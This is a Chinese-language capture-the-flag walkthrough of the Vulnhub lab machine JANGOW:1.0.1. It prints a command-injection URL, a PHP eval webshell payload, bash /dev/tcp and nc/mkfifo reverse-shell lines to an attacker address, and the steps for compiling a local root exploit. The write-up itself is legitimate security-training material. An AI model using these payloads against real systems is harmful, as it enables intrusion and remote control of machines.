Vulnhub - JANGOW:1.0.1

下载地址

题目描述

Difficulty: easy

The secret to this box is enumeration! Inquiries jangow2021@gmail.com

This works better with VirtualBox rather than VMware ## Changelog 2021-11-04 - v1.0.1 2021-11-01 - v1.0.0

靶机测试

首先进入靶机,可以发现有一个site文件夹

image-20220528155631314

点进site可以发现是一个web页面

image-20220528155655579

页面右上角Buscar的url为:

http://192.168.162.156/site/busque.php?buscar=

测试一下发现居然可以直接命令执行

http://192.168.162.156/site/busque.php?buscar=ls

image-20220528155829539

whoami一下可以得知权限是www-data权限,不是root权限

image-20220528160206735

尝试读取一下busque.php文件,由于存在空格,浏览器url上直接访问有点问题。burpsuite抓包一下做个测试

发现busque.php的内容就是一system函数命令执行,估计这题就是直接把入口点告诉我们了,关键应该是需要提权之类的。

<?php system($_GET['buscar']); ?>

image-20220528160052293

可以直接system执行命令的话,那就先写个shell

http://192.168.162.156/site/busque.php?buscar=echo%20%27%3C?php%20@eval($_POST[%27yue7%27]);%20?%3E%27%20%3E%3E%20yue7.php

再次ls一下即可发现写入成功

image-20220528161102825

尝试用蚁剑连接,可以发现成功连接

image-20220528161204164

在/home/jangow01/user.txt下发现第一个flag

d41d8cd98f00b204e9800998ecf8427e

image-20220528161237402

尝试进入root目录,发现没有权限,之后应该就是做一个提权了。

进入终端,利用uname -a可以得到服务器的系统版本

image-20220528161656236

去kali上搜索一下漏洞库,可以发现有一个本地提权的exp,而且版本也在漏洞范围之内

image-20220528161935015

直接讲exp下载下来

image-20220528162023507

之后尝试传入服务器内,直接传到web目录下,利用gcc进行编译

image-20220528162218273

编译成功,但是直接运行没有反应,看来需要一个可以获取终端的shell,得尝试将shell反弹出去,通过测试发现服务器内自带有python3和php。但是貌似权限都不大够,没法反弹成功,尝试bash -i >& /dev/tcp/192.168.162.188/7777 0>&1也反弹不了,估计都是权限有问题。

那就尝试写个php文件反弹,有点莫名其妙为什么只有443端口可以,其他端口就不行。

<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.162.188 443 >/tmp/f');?>

image-20220528171001248

php -r 'system("/bin/bash");'开不了shell,尝试用python的

python3 -c 'import pty;pty.spawn("/bin/bash")'

python就成功开启了一个ttyshell

image-20220528171326495

利用ttyshell再次尝试运行之前编译好的提权exp,可以发现运行成功,获得了root权限

image-20220528171459068

之后就去root目录看看有没有东西,可以发现cd目录下有一个proof.txt,cat一下成功获得第二个flag

da39a3ee5e6b4b0d3255bfef95601890afd80709

image-20220528171807921

发表评论